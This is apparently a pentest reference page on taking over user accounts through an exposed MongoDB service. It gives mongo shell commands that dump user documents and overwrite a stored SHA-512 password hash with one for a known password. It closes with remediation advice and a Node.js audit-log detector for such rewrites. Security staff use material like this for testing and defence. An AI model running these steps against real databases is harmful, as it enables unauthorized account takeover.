MongoDB - Impersonation via credentials change
With access to a MongoDB service, it may be possible to modify sensitive information stored for users in a database, for example the credentials that a website's login page checks against. The process is explained below. First connect to the service:
mongo --port $serviceport
List the databases on the server and switch to the one of interest. Then list its collections, pick one that looks important, and retrieve the sensitive documents it holds:
use $database;
show collections;
db.$chosenCollection.find(); // for example, db.admin.find();
// Example output
{"id": ObjectID("...id..."), "name": "...name...", "email": "...email...", "x_shadow": "...hash...",
...
Identify the hashing scheme of the stored password (the $6$ prefix in the example marks a SHA-512 crypt hash), generate a hash of a value you know with the same scheme, and write it into the user's document. The changed credentials can then be used to log in as that user:
db.admin.update({ "name": "...name..." }, { $set: { "x_shadow": "$6$9Ter1EZ9$4RCTnLfeDJsdAQ16M5d1d5Ztg2CE1J2IDlbAPSUcqYOoxjEEcpMQag41dtCQv2cJ.n9kvlx46hNT78dngJBVt0" } }); // example SHA-512 crypt hash generated for Ch4ngeM3VeryQu!ck
...
Remediation Actions
Use Role-Based Access Control (RBAC) to avoid modification of values by unauthorized users
Avoid giving the root, userAdmin, or dbAdmin roles to accounts used by applications
Enforce strong passwords for all users
Enable auditing for actions on sensitive collections
Hash passwords in the application layer using modern techniques like bcrypt or Argon2, and use salt and pepper for hashes
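The auditing item above is only useful if someone reads the audit log. The following Node.js script is an added example (not code from the original page): it scans mongod audit-log lines for successful update commands that rewrite a credential field in a watched collection and flags those issued by accounts holding admin roles. It assumes auditing is enabled with auditAuthorizationSuccess so successful commands appear as authCheck events; the namespace, field names and sample events are constructed.

```javascript
// Added example: detect credential-field rewrites in mongod audit-log lines.
// Assumptions (not from the original page): auditing with auditAuthorizationSuccess,
// so successful commands are logged as authCheck events whose "param.args" mirrors
// the command document; "app.admin", "x_shadow" and the sample events are constructed.
const WATCHED_FIELDS = { "app.admin": ["x_shadow", "email"] }; // namespace -> fields
const ADMIN_ROLES = new Set(["root", "userAdmin", "userAdminAnyDatabase",
  "dbAdmin", "dbAdminAnyDatabase"]);

// Top-level field names touched by an update document ($set/$unset operators or a replacement).
function changedFields(updateDoc) {
  const fields = new Set();
  for (const [key, val] of Object.entries(updateDoc || {})) {
    const names = key.startsWith("$") ? Object.keys(val || {}) : [key];
    for (const n of names) fields.add(n.split(".")[0]); // "profile.email" -> "profile"
  }
  return fields;
}

function findCredentialChanges(auditLines) {
  const findings = [];
  for (const line of auditLines) {
    let ev;
    try { ev = JSON.parse(line); } catch { continue; } // skip malformed lines
    if (!ev || ev.atype !== "authCheck" || ev.result !== 0) continue; // successes only
    const { command, ns, args } = ev.param || {};
    const watched = WATCHED_FIELDS[ns];
    if (command !== "update" || !watched) continue;
    for (const u of (args && args.updates) || []) {
      const hit = [...changedFields(u.u)].filter((f) => watched.includes(f));
      if (hit.length === 0) continue;
      findings.push({ ts: ev.ts && ev.ts.$date, ns, fields: hit,
        ip: ev.remote && ev.remote.ip,
        user: (ev.users || []).map((x) => `${x.user}@${x.db}`).join(",") || "<unauthenticated>",
        adminRole: (ev.roles || []).some((r) => ADMIN_ROLES.has(r.role)) });
    }
  }
  return findings;
}

// Constructed sample events: a benign read, a password-hash rewrite by an application
// account that was granted root (the situation the remediation list warns about), and junk.
const SAMPLE_AUDIT_LINES = [
  JSON.stringify({ atype: "authCheck", ts: { $date: "2024-01-01T10:00:00Z" }, remote: { ip: "10.0.0.5", port: 51000 }, users: [{ user: "webapp", db: "app" }], roles: [{ role: "readWrite", db: "app" }], param: { command: "find", ns: "app.admin", args: { find: "admin", filter: {} } }, result: 0 }),
  JSON.stringify({ atype: "authCheck", ts: { $date: "2024-01-01T10:05:00Z" }, remote: { ip: "10.0.0.5", port: 51001 }, users: [{ user: "webapp", db: "app" }], roles: [{ role: "root", db: "admin" }], param: { command: "update", ns: "app.admin", args: { update: "admin", updates: [{ q: { name: "alice" }, u: { $set: { x_shadow: "$6$<constructed-hash>" } } }] } }, result: 0 }),
  "not valid json",
];

for (const f of findCredentialChanges(SAMPLE_AUDIT_LINES)) console.log(JSON.stringify(f));
```

Feed it real lines with `findCredentialChanges(fs.readFileSync(path, "utf8").split("\n"))`; a finding with adminRole true from an application account is exactly the over-privileged situation the RBAC items above are meant to prevent.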